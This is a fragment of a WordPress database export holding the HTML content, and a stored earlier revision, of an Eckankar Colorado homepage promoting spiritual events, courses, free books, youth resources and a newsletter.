style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237020,40281,'post_prev_post_content','<div style=\"height: 34%; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\" ><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #cccccc;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised 